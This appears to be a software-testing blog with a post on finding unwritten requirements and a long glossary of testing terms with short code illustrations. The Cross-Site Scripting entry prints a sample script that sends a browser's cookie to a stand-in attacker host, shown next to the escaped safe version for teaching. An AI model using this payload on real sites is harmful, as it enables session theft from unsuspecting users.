Wednesday, May 6, 2009

How can I design test cases, if I don't have a Requirements Document?

"How can I design test cases, if I don't have a Requirements Document?"

But, there are ALWAYS requirements - even if they are not formally documented. They may take some time to discover and list, but they exist. Here's one approach to finding those "hidden" requirements.

First, look for general requirements and work to document them. Some of these requirements come from previous versions of the application, some come from generally accepted usage. For example:
1. Must run on platforms x,y,z (perhaps because those platforms have always been supported)
2. Must use abc database
3. Must be able to process n records in m seconds
4. Must be at least as fast as release n - 1
5. Must not consume more memory (or other resources) than release n - 1
6. Must not crash
7. Must not corrupt data
8. Must use standards relevant to the platform (standard Windows UI, for example)
9. Must not have any misspellings
10. Must be grammatically correct
11. Must incorporate the company's usual look-and-feel
12. Must be internally consistent
13. Must work in particular locales
14. Must be complete when expected by the stakeholders (perhaps for some event, such as a Beta)
If it's a web site or application, some additional requirements might include:
1. Must not be missing any images
2. Must not have any broken links (a quick automated check for both is sketched just after this list)
3. Must basically work the same in all browsers which are officially supported by the company
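Checks 1 and 2 are easy to automate, even for a single page. Here's a minimal sketch, assuming Python with the requests and beautifulsoup4 packages installed; the start URL is just a placeholder:

# Minimal broken-link / missing-image check (sketch only).
# Assumes the 'requests' and 'beautifulsoup4' packages are installed;
# the start URL below is a placeholder.
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

START_URL = "http://example.com/"   # hypothetical starting page

page = requests.get(START_URL, timeout=10)
soup = BeautifulSoup(page.text, "html.parser")

# Collect link targets and image sources from the page.
targets = [urljoin(START_URL, a["href"]) for a in soup.find_all("a", href=True)]
targets += [urljoin(START_URL, img["src"]) for img in soup.find_all("img", src=True)]

for url in targets:
    try:
        status = requests.head(url, allow_redirects=True, timeout=10).status_code
    except requests.RequestException:
        status = None
    if status is None or status >= 400:
        print("Possible broken reference:", url, status)

A real crawler would follow links site-wide, but even this single-page version catches the obvious missing images and dead links.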
Then, interview the project manager or developers and find out what they intend to do with this release. Document the intentions and use them as requirements.
Solicit input from anyone who is a stakeholder in the project. Share everything you find with everyone and revise it as needed.
Sometimes, writing all of this up as assumptions can go a long way toward gaining a consensus as to the "real requirements" you can use to test against.

Once the system is at all testable, do some exploratory testing. As you find "undocumented features", add them to the list of topics to be discussed.

Find out if the product is internally consistent. (This is an area I find to be very useful.) Even if I know nothing at all about a product, I assume it must be consistent within itself, and within the environment in which it must operate.

Look for external standards within which the product must operate. If it is a tax or accounting program, tax law must prevail and generally accepted accounting principles must apply.

Ideally, all of these issues have already been considered and written into the formal Requirements documentation which is handed to you. But if not, don't give up. Dig in and discover!

Tuesday, May 5, 2009

A Glossary of Testing Terms

Acceptance Criteria
The exit criteria that a component or system must satisfy in order to be accepted by a user, customer, or other authorized entity. [IEEE]
Acceptance Testing
The process of the user testing the system and, based on the results, either granting or refusing acceptance of the software/system being tested. [wikipedia]
The process of comparing the program to its initial requirements and the current needs of its end users. It is an unusual type of test in that it is usually performed by the program's customer or end user, and normally is not considered the responsibility of the development organization. [G. Myers]
Testing to verify readiness for implementation or use.
Formal testing conducted to determine whether or not a system satisfies its acceptance criteria and to enable the customer to determine whether or not to accept the system. [B. Hetzel]
Accessibility Testing
Verifying that a product is accessible to people with disabilities.
Ad-Hoc Testing
The process of improvised, impromptu bug searching. [J. Bach]
Agile Testing
Testing practice for projects using agile methodologies, such as extreme programming (XP), treating development as the customer of testing and emphasizing a test-first design paradigm. See also Test Driven Development. [ISTQB]
Alpha Testing
Testing conducted internally by the manufacturer, alpha testing takes a new product through a protocol of testing procedures to verify product functionality and capability. In-house testing. This is the period before Beta Testing.
In-house testing performed by the test team (and possibly other interested, friendly insiders). [C. Kaner, et al]
Anomaly
Any condition that deviates from expectation based on requirements specifications, design documents, user documents, standards, etc., or from someone's perception or experience. Anomalies may be found during, but not limited to, reviewing, testing, analysis, compilation, or use of software products or applicable documentation. [IEEE]
Application Under Test
(AUT) The application which is the target of the testing process.
Audit
An independent evaluation of software products or processes to ascertain compliance to standards, guidelines, specifications, and/or procedures based on objective criteria, including documents that specify:
(1) the form or content of the products to be produced
(2) the process by which the products shall be produced
(3) how compliance to standards or guidelines shall be measured [IEEE]
Audit Trail
A path by which the original input to a process (e.g. data) can be traced back through the process, taking the process output as a starting point. This facilitates defect analysis and allows a process audit to be carried out. [ISTQB]
Automated Testing
Testing which is performed, to a greater or lesser extent, by a computer, rather than manually.
Availability
The degree to which a component or system is operational and accessible when required for use. Often expressed as a percentage. [IEEE]
Back-to-Back Testing
Testing in which two or more variants of a component or system are executed with the same inputs, the outputs compared, and analyzed in cases of discrepancies. [IEEE]
Baseline
A specification or software product that has been formally reviewed or agreed upon, that thereafter serves as the basis for further development, and that can be changed only through a formal change control process. [IEEE]
More generally, a baseline is a set of observations or values that represent the background level of some measurable quantity. Once a baseline is established, variations to that baseline can be measured after something in the system is changed.
Behavioral Testing
Some people confuse "black box" testing with "behavioral" testing. I am amused to be able to cite the IEEE standards (several of them) and SWEBOK (the IEEE's Software Engineering Body of Knowledge) as agreeing with my definition. (Makes me wonder whether I should adopt a different definition.) When you do behavioral testing, you specify your tests in terms of externally visible inputs, outputs, and events. However, you can use any source of information in the design of the tests. The behavioral tester will use information gained by reading the source code or internal design specs if that is readily available. The black box tester will not. The strength of the black box approach is that it drives the black box tester to develop understanding and expertise in areas that are probably different from the programmer, and therefore the tester will think in different ways and probably imagine and catch problems that don't occur to the programmer. [C. Kaner]
Benchmark Test
(1) A standard against which measurements or comparisons can be made. (2) A test that is to be used to compare components or systems to each other or to a standard as in (1). [IEEE]
Bespoke Software
See - Custom Software
Beta Testing
Testing conducted at one or more customer sites by the end-user of a software product or system. This is usually a "friendly" user and the testing is conducted before the system is made generally available.
A type of user testing that uses testers who aren't part of your organization and who are members of your product's target market. The product under test is typically very close to completion. [C. Kaner, et al]
Black Box Testing
Black box testing refers to testing that is done without reference to the source code or other information about the internals of the product. The black box tester consults external sources for information about how the product runs (or should run), what the product-related risks are, what kinds of errors are likely and how the program should handle them, and so on. [C. Kaner]
Blink Testing
Looking for overall patterns of unexpected changes, rather than focusing in on the specifics. For example, rapidly flipping between two web pages which are expected to be the same. If they are not the same, differences stand out visibly. Or, rapidly scrolling through a large log file, looking for unusual patterns of log messages.
Boundary Value
In the context of a software program, a boundary value is a specific value at the extreme edges of an independent linear variable or at the edge or edges of equivalence class subsets of an independent linear variable. [Bj Rollison]
Boundary Value Analysis
Guided testing which explores values at and near the minimum and maximum allowed values for a particular input or output.
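For example, if a quantity field is specified to accept whole numbers from 1 to 100, boundary value analysis points at the values sitting on and next to each edge. A minimal sketch (the function and its range are invented for illustration):

# Sketch of boundary value analysis for a hypothetical accepts_quantity(n)
# function specified to accept integers from 1 to 100 inclusive.
def accepts_quantity(n):
    return 1 <= n <= 100

# Values at and adjacent to the minimum and maximum boundaries.
boundary_cases = [(0, False), (1, True), (2, True),
                  (99, True), (100, True), (101, False)]

for value, expected in boundary_cases:
    assert accepts_quantity(value) == expected, value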
Branch Coverage
The percentage of branches that have been exercised by a test suite. 100% branch coverage implies both 100% decision coverage and 100% statement coverage. [ISTQB]
Bug
A computer bug is an error, flaw, mistake, failure, or fault in a computer program that prevents it from working correctly or produces an incorrect result. Bugs arise from mistakes and errors, made by people, in either a program's source code or its design. It is said that there are bugs in all useful computer programs, but well-written programs contain relatively few bugs, and these bugs typically do not prevent the program from performing its task. ... [wikipedia]
Bug Bash
In-house testing using secretaries, programmers, marketers, and anyone who is available. A typical bug-bash lasts a half-day and is done when the software is close to being ready to release. [C. Kaner, et al]
Bug Triage or Bug Crawl or Bug Scrub
A meeting or discussion focused on an item-by-item review of every active bug reported against the system under test. During this review, fix dates can be assigned, insignificant bugs can be deferred, and project management can assess the progress of the development process. Also called a bug scrub. [R. Black]
Build Verification Test (BVT) or Build Acceptance Test (BAT)
A set of tests run on each new build of a product to verify that the build is testable before the build is released into the hands of the test team. This test is generally a short set of tests, which exercise the mainstream functionality of the application software.
Capability Maturity Model (CMM)
A five-level staged framework that describes the key elements of an effective software process. The Capability Maturity Model covers best-practices for planning, engineering and managing software development and maintenance. [CMM]
Capability Maturity Model Integration (CMMI)
A framework that describes the key elements of an effective product development and maintenance process. The Capability Maturity Model Integration covers best-practices for planning, engineering and managing product development and maintenance. CMMI is the designated successor of the CMM. [CMMI]
Capacity Testing
Testing to determine the maximum users a computer or set of computers can support. [A. Page]
Cause-And-Effect Diagram
A diagram used to depict and help analyze factors causing an overall effect. Also called a Fishbone Diagram or Ishikawa Diagram.
Churn
Churn is a term used to describe the amount of changes that happen in a file or module over a selected period.

Clear Box Testing
See: Glass Box Testing
Code Coverage
An analysis method that determines which parts of the software have been executed (covered) by the test suite and which parts have not been executed, e.g. statement coverage, decision coverage or condition coverage. [ISTQB]
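A tiny example shows why the different coverage measures are not interchangeable. In the sketch below (a made-up function, not tied to any particular coverage tool), a single test executes every statement, yet half of the branch outcomes are never exercised:

# Illustration: one test can reach 100% statement coverage while
# leaving branch/decision coverage at 50%.
def bonus(sales, is_manager):
    amount = 0
    if sales > 1000:
        amount = 100          # executed by the test below
    if is_manager:
        amount += 50          # executed by the test below
    return amount

# This single test touches every statement, but the "false" outcome of
# each 'if' is never exercised, so only 2 of 4 branch outcomes are covered.
assert bonus(2000, True) == 150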
Code Freeze
The point in time in the development process in which no changes whatsoever are permitted to a portion or the entirety of the program's source code. [wikipedia]
Command Line Interface (CLI)
In Command line interfaces, the user provides the input by typing a command string with the computer keyboard and the system provides output by printing text on the computer monitor. [wikipedia]
Commercial Off-The-Shelf Software (COTS)
A software product that is developed for the general market, i.e. for a large number of customers, and that is delivered to many customers in identical format. [ISTQB]
Component Testing
Component testing is the act of subdividing an object-oriented software system into units of particular granularity, applying stimuli to the component’s interface and validating the correct responses to those stimuli, in the form of either a state change or reaction in the component, or elsewhere in the system. [M. Silverstein]
Compliance
The capability of the software product to adhere to standards, conventions or regulations in laws and similar prescriptions. [ISTQB]
Compliance Testing
The process of testing to determine the compliance of the component or system. [ISTQB]
Concurrency Testing
Testing to determine how the occurrence of two or more activities within the same interval of time, achieved either by interleaving the activities or by simultaneous execution, is handled by the component or system. [IEEE]
Configuration Management
A discipline applying technical and administrative direction and surveillance to: identify and document the functional and physical characteristics of a configuration item, control changes to those characteristics, record and report change processing and implementation status, and verify compliance with specified requirements. [IEEE]
Critical Path
A series of dependent tasks for a project that must be completed as planned to keep the entire project on schedule. [SEI]
Cross-Site Scripting
Cross site scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is. From the trusted context, an attack can be launched. Note that although cross site scripting is also sometimes abbreviated "CSS", it has nothing to do with the Cascading Style Sheets technology that is more commonly called CSS. [wikipedia]
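As a rough illustration (using Python's standard html module as a stand-in for whatever templating the application really uses), the danger is rendering untrusted text without escaping it:

# Illustration: a comment string containing script markup, rendered once
# without escaping (exploitable) and once escaped with Python's html module.
import html

comment = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

unsafe_page = "<p>" + comment + "</p>"               # script would run in the victim's browser
safe_page   = "<p>" + html.escape(comment) + "</p>"  # rendered as harmless text

print(unsafe_page)
print(safe_page)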
Cyclomatic Complexity
Cyclomatic complexity is the most widely used member of a class of static software metrics. Cyclomatic complexity may be considered a broad measure of soundness and confidence for a program. Introduced by Thomas McCabe in 1976, it measures the number of linearly-independent paths through a program module. [SEI]
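As a rough rule of thumb for simple structured code, the complexity of a routine can be counted as the number of decision points plus one. The hypothetical function below has two decisions, so its cyclomatic complexity is 3, i.e. three linearly independent paths that tests would need to cover:

# Sketch: counting decisions + 1 for a small, made-up function.
def trim_and_count(items, limit):
    count = 0
    while count < len(items):        # decision 1
        if items[count] > limit:     # decision 2
            items[count] = limit
        count += 1
    return count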
Daily Build
A development activity where a complete system is compiled and linked every day (usually overnight) so that a consistent system is available at any time including all latest changes. [ISTQB]
Data-Driven Testing
Testing in which the actions of a test case are parameterized by externally defined data values, often maintained as a file or spreadsheet. This is a common technique in Automated Testing.
A scripting technique that stores test inputs and expected outcomes as data, normally in a table or spreadsheet, so that a single control script can execute all of the tests in the data table. [M. Fewster]
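A minimal sketch of the idea (the CSV file name, its columns, and the discount function are all invented for illustration):

# Sketch of a data-driven control script: inputs and expected outcomes live
# in an external table (here a CSV file; the path is a placeholder), and one
# generic loop runs them all against the function under test.
import csv

def discount(price, code):           # stand-in for the application under test
    return price * 0.9 if code == "SAVE10" else price

with open("discount_cases.csv", newline="") as f:   # columns: price,code,expected
    for row in csv.DictReader(f):
        actual = discount(float(row["price"]), row["code"])
        assert abs(actual - float(row["expected"])) < 0.01, row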
Debugging
The process in which developers determine the root cause of a bug and identify possible fixes. Developers perform debugging activities to resolve a known bug either after development of a subsystem or unit or because of a bug report. [R. Black]
Decision Coverage
The percentage of decision outcomes that have been exercised by a test suite. 100% decision coverage implies both 100% branch coverage and 100% statement coverage. [ISTQB]
Defect
A flaw in a component or system that can cause the component or system to fail to perform its required function, e.g. an incorrect statement or data definition. A defect, if encountered during execution, may cause a failure of the component or system. [ISTQB]
Defect Density
The number of defects identified in a component or system divided by the size of the component or system (expressed in standard measurement terms, e.g. lines-of-code, number of classes or function points). [ISTQB]
Defect Leakage Ratio (DLR)
The ratio of the number of defects which made their way undetected ("leaked") into production divided by the total number of defects.
Defect Masking
An occurrence in which one defect prevents the detection of another. [IEEE]
Defect Prevention
The activities involved in identifying defects or potential defects and preventing them from being introduced into a product. [SEI]
Defect Rejection Ratio (DRR)
The ratio of the number of defect reports which were rejected (perhaps because they were not actually bugs) divided by the total number of defects.
Defect Removal Efficiency (DRE)
The ratio of defects found during development to total defects (including ones found in the field after release).
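A quick worked example, using made-up numbers, shows how these ratios fit together (the exact denominators vary from one organization to another):

# Worked example with made-up numbers (real projects define the exact
# denominators in their own way).
found_in_test  = 180     # confirmed defects found before release
found_in_field = 20      # defects that "leaked" into production
rejected       = 15      # reports closed as not-a-bug
kloc           = 50      # size of the release, in thousands of lines of code

total_defects  = found_in_test + found_in_field          # 200
defect_density = total_defects / kloc                    # 4.0 defects per KLOC
dlr            = found_in_field / total_defects          # 0.10 -> 10% leaked
dre            = found_in_test / total_defects           # 0.90 -> 90% removed before release
drr            = rejected / (found_in_test + rejected)   # ~0.08 of reports rejected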
Deviation
A noticeable or marked departure from the appropriate norm, plan, standard, procedure, or variable being reviewed. [SEI]
Direct Metric
A metric that does not depend upon a measure of any other attribute [IEEE]
Distributed Testing
Testing that occurs at multiple locations, involves multiple teams, or both. [R. Black]
Domain
The set from which valid input and/or output values can be selected. [ISTQB]
Driver
A software component or test tool that replaces a component that takes care of the control and/or the calling of a component or system. [ISTQB]
Eating Your Own Dogfood
Your company uses and relies on pre-release versions of its own software, typically waiting until the software is reliable enough for real use before selling it. [C. Kaner, et al]
Entry Criteria
A set of decision-making guidelines used to determine whether a system under test is ready to move into, or enter, a particular phase of testing. Entry criteria tend to become more rigorous as the test phases progress. [R. Black]
Equivalence Partition
A portion of an input or output for which the behavior of a component or system is assumed to be the same, based on the specification. [ISTQB]
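For instance, a fare calculator that charges by age group naturally splits its input into a few classes, and one representative value per class is assumed to stand for the whole partition. A sketch (the function and the age ranges are invented):

# Sketch: a hypothetical fare-category function whose input space splits
# into three valid equivalence classes plus an invalid one.
def fare_category(age):
    if age < 0:
        raise ValueError("invalid age")
    if age < 18:
        return "child"
    if age < 65:
        return "adult"
    return "senior"

# One representative value per partition stands for the whole class.
representatives = [(-3, ValueError), (10, "child"), (40, "adult"), (70, "senior")]
for age, expected in representatives:
    if expected is ValueError:
        try:
            fare_category(age)
            assert False, "expected ValueError"
        except ValueError:
            pass
    else:
        assert fare_category(age) == expected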
Error Guessing
A test design technique where the experience of the tester is used to anticipate what defects might be present in the component or system under test as a result of errors made, and to design tests specifically to expose them. [ISTQB]
Error Seeding
The process of intentionally adding known defects to those already in the component or system for the purpose of monitoring the rate of detection and removal, and estimating the number of remaining defects. [ISTQB]
Exit Criteria
A set of decision-making guidelines used to determine whether a system under test is ready to exit a particular phase of testing. When exit criteria are met, either the system under test moves on to the next test phase or the test project is considered complete. Exit criteria tend to become more rigorous as the test phases progress. [R. Black]
Exhaustive Testing
A test approach in which the test suite comprises all combinations of input values and preconditions. [ISTQB]

Exploratory Testing
Test design and test execution at the same time. This is the opposite of scripted testing (predefined test procedures, whether manual or automated). Exploratory tests, unlike scripted tests, are not defined in advance and carried out precisely according to plan. Exploratory testing is sometimes confused with "ad hoc" testing. [J. Bach]
Exploratory software testing is a style of software testing that emphasizes the personal freedom and responsibility of the individual tester to continually optimize the value of her work by treating test-related learning, test design, test execution, and test result interpretation as mutually supportive activities that run in parallel throughout the project. [Kaner, Bach, Bolton, et al]
Simultaneous (or parallel) test design, test execution and learning. [Bolton]
Extreme Programming (XP)
Extreme Programming (XP) is a method or approach to software engineering and the most popular of several agile software development methodologies. It was formulated by Kent Beck, Ward Cunningham, and Ron Jeffries. Kent Beck wrote the first book on the topic, Extreme programming explained: Embrace change, published in 1999. ... [wikipedia]
Failure Mode
A particular way, in terms of symptoms, behaviors, or internal state changes, in which a failure manifests itself. For example, a heat dissipation problem in a CPU might cause a laptop case to melt or warp, or memory mismanagement might cause a core dump. [R. Black]
Failure Mode and Effect Analysis (FMEA)
A systematic approach to risk identification and analysis of identifying possible modes of failure and attempting to prevent their occurrence [ISTQB]
Falsification
The process of evaluating an object to demonstrate that it does not meet requirements. [B. Beizer]
Fault Injection
The process of intentionally incorporating errors in code in order to measure the ability (of the tester, or processes) to detect such errors.
Fault Model
An engineering model of something that could go wrong in the construction or operation of a piece of equipment. [wikipedia] This can be extended to software testing, as a model of the types of errors that could occur in a system under test.
Fault Tolerance
The capability of the software product to maintain a specified level of performance in cases of software faults (defects) or of infringement of its specified interface. [ISO 9126]
Feature
A desirable behavior of an object; a computation or value produced by an object. Requirements are aggregates of features. [B. Beizer]
Feature Freeze
The point in time in the development process in which all work on adding new features is suspended, shifting the effort towards fixing bugs and improving the user experience. [wikipedia]
First Customer Ship (FCS)
The period which signifies entry into the final phase of a project. At this point, the product is considered wholly complete and ready for purchase and usage by the customers. It may precede the phase where the product is manufactured in quantity and ready for General Availability (GA).
Fishbone Diagram
A diagram used to depict and help analyze factors causing an overall effect. Also called a Cause-And-Effect Diagram or Ishikawa Diagram.
Formal Testing
Process of conducting testing activities and reporting test results in accordance with an approved test plan. [B. Hetzel]
Functional Requirements
An initial definition of the proposed system, which documents the goals, objectives, user or programmatic requirements, management requirements, the operating environment, and the proposed design methodology, e.g., centralized or distributed.
Functional Testing
Process of testing to verify that the functions of a system are present as specified. [B. Hetzel]
Testing requiring the selection of test scenarios without regard to the structure of the source code. [J. Whittaker]
Fuzz Testing
A software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example by crashing or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior. [wikipedia]
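A bare-bones fuzzer can be just a loop feeding random bytes to the component under test. In this sketch, Python's own json parser stands in for that component; rejecting garbage cleanly is expected, while any other failure is worth a bug report:

# Minimal fuzzing sketch: feed random byte strings to a parser and record
# anything other than clean success or a controlled parse error.
import json, random

random.seed(1234)            # reproducible "random" fuzz data
for _ in range(10000):
    blob = bytes(random.randrange(256) for _ in range(random.randrange(1, 64)))
    try:
        json.loads(blob)
    except (ValueError, UnicodeDecodeError):
        pass                 # rejecting malformed input is the expected behavior
    except Exception as err: # anything else is a potential defect worth logging
        print("Unexpected failure:", repr(blob), err)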
Gap Analysis
An assessment of the difference between what is required or desired, and what actually exists.
General Availability (GA)
The phase in which the product is complete, and has been manufactured in sufficient quantity such that it is ready to be purchased by all the anticipated customers.
Glass Box Testing
Glass Box testing (aka "White Box", but who can see through white boxes? They're just as opaque as black ones) is about testing with thorough knowledge of the code. The programmer might be the person who does this. I have seen members of independent test groups do this type of testing. Some risks are invisible to the black box tester but not too hard to see in the source, such as weak error handling, a weak model of interrupt-triggering events, excessive coupling of different parts of the program, etc. The test groups that do this type of work **usually** specialize one or a few people who do nothing but read the source code looking for interesting / risky areas and then designing thorough tests to exploit those risks. (I say "usually" because some languages, like COBOL, are so well designed for readability that evaluation of the source code is done by most of the members of the test team. Many of the books and papers on testing that talk to you as if it's obvious that you're going to design your tests after reading the source code, were written in the context of business applications coded in COBOL.) [C. Kaner]
Gray Box Testing
A combination of Black Box and White Box testing. Testing software against its specification but also using some knowledge of its internal workings.
Happy Path
A default scenario that features no exceptional or error conditions. A well-defined test case that uses known input, that executes without exception and that produces an expected output. [wikipedia]
Simple inputs that should always work. [A. Page]
IEEE 829 (829 Standard for Software Test Documentation)
An IEEE standard which specifies the format of a set of documents used in software testing. These documents are Test Plan, Test Design Specification, Test Case Specification, Test Procedure Specification, Test Item Transmittal Report, Test Log, Test Incident Report, and Test Summary Report. [IEEE]
Incident
An operational event that is not part of the normal operation of a system. It will have an impact on the system, although this may be slight or transparent to the users. [wikipedia]
Incident Report
A document reporting on any event that occurred, e.g. during the testing, which requires investigation. [IEEE 829]
Incremental Testing
A disciplined method of testing the interfaces between unit-tested programs as well as between system components. Two types of incremental testing are often mentioned: top-down and bottom-up.
Independent V&V
Verification and validation of a software product by an independent organization (other than the designer). [B. Hetzel]
Input Masking
Input masking occurs when a program throws an error condition on the first invalid variable and subsequent values are not tested. [Bj Rollison]
Inspection
A formal evaluation technique involving detailed examination by a person or group other than the author to detect faults and problems.
Integration Testing
Integration testing is the phase of software testing in which individual software modules are combined and tested as a group. It follows unit testing and precedes system testing. [wikipedia]
An orderly progression of testing in which software and/or hardware elements are combined and tested until the entire system has been integrated. [B. Hetzel]
The testing of multiple components that have each received prior and separate unit testing. [J. Whittaker]
Interface Testing
Testing conducted to ensure that the program or system components pass information and control correctly.
Internationalization
Internationalization (I18N) is the process of designing and coding a product so it can perform properly when it is modified for use in different languages and locales.
Ishikawa Diagram
A diagram used to depict and help analyze factors causing an overall effect, named after Kaoru Ishikawa. Also called a Fishbone Diagram or Cause-And-Effect Diagram.
Keyword-Driven Testing
A scripting technique that uses data files to contain not only test inputs and expected outcomes, but also keywords related to the application being tested. The keywords are interpreted by special supporting scripts that are called by the control script for the test. [M. Fewster]
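A stripped-down sketch of the idea (the keywords, the data table, and the fake "application" actions are all invented; a real framework would drive the actual application under test instead of printing):

# Sketch of a keyword-driven control script.
def open_account(name):    print("opened", name)
def deposit(name, amount): print("deposited", amount, "into", name)
def check_balance(name, expected): print("checking", name, "==", expected)

KEYWORDS = {"open": open_account, "deposit": deposit, "check": check_balance}

# Test data: each row is a keyword followed by its arguments.
table = [
    ("open", "savings"),
    ("deposit", "savings", "100"),
    ("check", "savings", "100"),
]

for keyword, *args in table:
    KEYWORDS[keyword](*args)     # the supporting script interprets each keyword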
Kludge (or kluge)
Any ill-advised, substandard, or "temporary" bandage applied to an urgent problem in the (often misguided) belief that doing so will keep a project moving forward. [R. Black]
Link Rot
The process by which links on a website gradually become irrelevant or broken as time goes on, because websites that they link to disappear, change their content or redirect to new locations. [Wikipedia]
Load Testing
Load testing is subjecting a system to a statistically representative (usually) load. The two main reasons for using such loads are in support of software reliability testing and in performance testing. [B. Beizer]
Localization
Localization (L10N) refers to the process, on a properly internationalized base product, of translating messages and documentation as well as modifying other locale specific files.
Low-resource Testing
Low-resource testing determines what happens when the system is low or depleted of a critical resource such as physical memory, hard disk space, or other system-defined resources. [A. Page]
Maintainability
Maintainability describes the effort needed to make changes in software without causing errors. [A. Page]

MEGO
Acronym for My Eyes Glazed Over; refers to a loss of focus and attention, often caused by an attempt to read a particularly impenetrable or dense technical document. [R. Black]
Memory Leak
A particular type of unintentional memory consumption by a computer program where the program fails to release memory when no longer needed. This condition is normally the result of a bug in a program that prevents it from freeing up memory that it no longer needs. [Wikipedia]
Method
A reasonably complete set of rules and criteria that establish a precise and repeatable way of performing a task and arriving at a desired result. [SEI]
Methodology
A collection of methods, procedures, and standards that defines an integrated synthesis of engineering approaches to the development of a product. [SEI]
Metric
A quantitative measure of the degree to which a system, component, or process possesses a given attribute [IEEE]
The assignment of a numeric value to an object or event according to a rule derived from a model or theory. [C. Kaner]
Milestone
A scheduled event for which some individual is accountable and that is used to measure progress. [SEI]
Monkey Testing
Pounding away at the keyboard with presumably random input strings until something breaks. [B. Beizer]
Mutation Testing
With mutation testing, the system/program under test is changed to create a faulty version called a mutant. You then run the mutant program through a suite of test cases, which should produce new test case failures. If no new failures appear, the test suite most likely does not exercise the code path containing the mutated code, which means the program isn't fully tested. You can then create new test cases that do exercise the mutant code. [J. McCaffrey]
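A hand-made example (a real mutation tool generates the mutants automatically):

# Sketch: a deliberately mutated copy of a small function, used to judge
# how good the existing test suite is.
def classify(n):             # original
    if n > 0:
        return "pos"
    if n < 0:
        return "neg"
    return "zero"

def classify_mutant(n):      # mutant: second comparison weakened to n <= 0
    if n > 0:
        return "pos"
    if n <= 0:
        return "neg"
    return "zero"

suite = [(5, "pos"), (-2, "neg")]   # note: no test for n == 0

# The mutant passes every test in the suite (it "survives"), revealing that
# the zero case is never exercised. Adding the case (0, "zero") kills it.
for n, expected in suite:
    assert classify(n) == expected
    assert classify_mutant(n) == expected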
Negative Testing
Testing whose primary purpose is falsification; that is testing designed to break the software. (also called Dirty Testing) [B. Beizer]
Non-functional Testing
Testing the attributes of a component or system that do not relate to functionality, e.g. reliability, efficiency, usability, maintainability and portability. [ISTQB]
Oracle
Any means used to predict the outcome of a test. [W. Howden]
The mechanism which can be used to compare the actual output that the application under test produces with the expected output. [J. Whittaker]
Operational Testing
Testing by the end user on software in its normal operating environment (DOD). [B. Hetzel]
Pareto Analysis
The analysis of defects by ranking causes from most significant to least significant. Pareto analysis is based on the principle, named after the 19th-century economist Vilfredo Pareto, that most effects come from relatively few causes, i.e. 80% of the effects come from 20% of the possible causes. [SEI]
Performance Evaluation
The assessment of a system or component to determine how effectively operating objectives have been achieved. [B. Hetzel]
Performance Testing
Testing conducted to evaluate the compliance of a system or component with specified performance requirements. [IEEE]
Testing that attempts to show that the program does not satisfy its performance objectives. [G. Myers]
Positive Testing
Testing whose primary purpose is validation; that is testing designed to demonstrate the software's correct working. (also called Clean Testing) [B. Beizer]
Priority
Priority indicates when your company wants a particular bug fixed. Priorities change as a project progresses.
Prototype
A prototype of software is an incomplete implementation of software that mimics the behavior we think the users need. [M.E. Staknis]
Pseudo-random
A series which appears to be random but is in fact generated according to some prearranged sequence. [ISTQB]
Quality
The ability of a set of inherent characteristics of a product, system or process to fulfil requirements of customers and other interested parties [ISO 9000:2000]
Conformance to requirements or fitness for use. Quality can be defined through five principal approaches: (1) Transcendent quality is an ideal, a condition of excellence. (2) Product-based quality is based on a product attribute. (3) User-based quality is fitness for use. (4) Manufacturing-based quality is conformance to requirements. (5) Value-based quality is the degree of excellence at an acceptable price. Also, quality has two major components: (1) quality of conformance—quality is defined by the absence of defects, and (2) quality of design—quality is measured by the degree of customer satisfaction with a product’s characteristics and features. [North Carolina State University]
Quality means "meets requirements". [B. Hetzel]
The degree to which a component, system or process meets specified requirements and/or user/customer needs and expectations. [ISTQB]
Quality Factor
A management-oriented attribute of software that contributes to its quality. [IEEE]
Quality Gate
A milestone in a project where a particular quality level must be achieved before moving on.
Rainy-Day Testing
Checking whether a system adequately prevents, detects and recovers from operational problems such as downed network connections, databases which become unavailable, equipment failures and operator errors. [R. Stens]
Recoverability
The capability of the software product to re-establish a specified level of performance and recover the data directly affected in case of failure. [ISTQB]
Regression Testing
Regression testing is that testing that is performed after making a functional improvement or repair to the program. Its purpose is to determine if the change has regressed other aspects of the program. It is usually performed by rerunning some subset of the program's test cases. [G. Myers]
Selective testing to verify that modifications have not caused unintended adverse side effects or to verify that a modified system still meets requirements. [B. Hetzel]
Release Candidate
A Release Candidate is a build of a product undergoing final testing before shipment. All code is complete, and all known bugs which should be fixed, have already been fixed. Unless a critical, show-stopper bug is found during this final phase, the Release Candidate becomes the shipping version.
Release Test (or Production Release Test)
Tests designed to ensure that the code (which has already been thoroughly tested and approved for release) is correctly installed and configured in Production. This is often a fairly quick test, but may involve some migration tests as well.
Reliability
The ability of the software product to perform its required functions under stated conditions for a specified period of time, or for a specified number of operations. [ISTQB]
Repetition Testing (Duration Testing)
A simple, brute force technique of determining the effect of repeating a function or scenario. The essence of this technique is to run a test in a loop until reaching a specified limit or threshold, or until an undesirable action occurs. [A. Page]
Requirement
A condition or capability needed by a user to solve a problem or achieve an objective. [B. Hetzel]
Requirements
That which an object should do and/or characteristics that it should have. Requirements are arbitrary but they must still be consistent, reasonably complete, implementable, and most important of all, falsifiable. [B. Beizer]
Re-testing
Testing that runs test cases that failed the last time they were run, in order to verify the success of corrective actions. [ISTQB]
Risk
Possibility of suffering loss. [SEI]
Robustness
The degree to which a system or component can function correctly in the presence of invalid inputs or stressful environmental conditions. [IEEE]
Root Cause
The underlying reason why a bug occurs, as opposed to the observed symptoms of the bug. Root cause data is most useful in the aggregate: analyzing a breakdown of the root causes of all bugs found in a system under test can help to focus the attention of both test and development on those areas that are causing the most serious and frequent problems. [R. Black]
Sanity Testing
A quick test of the main portions of a system to determine if it is basically operating as expected, but avoiding in-depth testing. This term is often equivalent to Smoke Testing.
Scalability
The ability to scale to support larger or smaller volumes of data and more or fewer users. The ability to increase or decrease size or capability in cost-effective increments with minimal impact on the unit cost of business and the procurement of additional services.
The ability of a software system to cope as the size of the problem increases.
Severity
Severity refers to the relative impact or consequence of a bug, and usually doesn't change unless you learn more about some hidden consequences.
Smart Monkey Testing
In Smart Monkey Testing, inputs are generated from probability distributions that reflect actual expected usage statistics -- e.g., from user profiles. There are different levels of IQ in smart monkey testing. In the simplest, each input is considered independent of the other inputs. That is, a given test requires an input vector with five components. In low IQ testing, these would be generated independently. In high IQ monkey testing, the correlation (e.g., the covariance) between these input distributions is taken into account. In all branches of smart monkey testing, the input is considered as a single event. [T. Arnold]
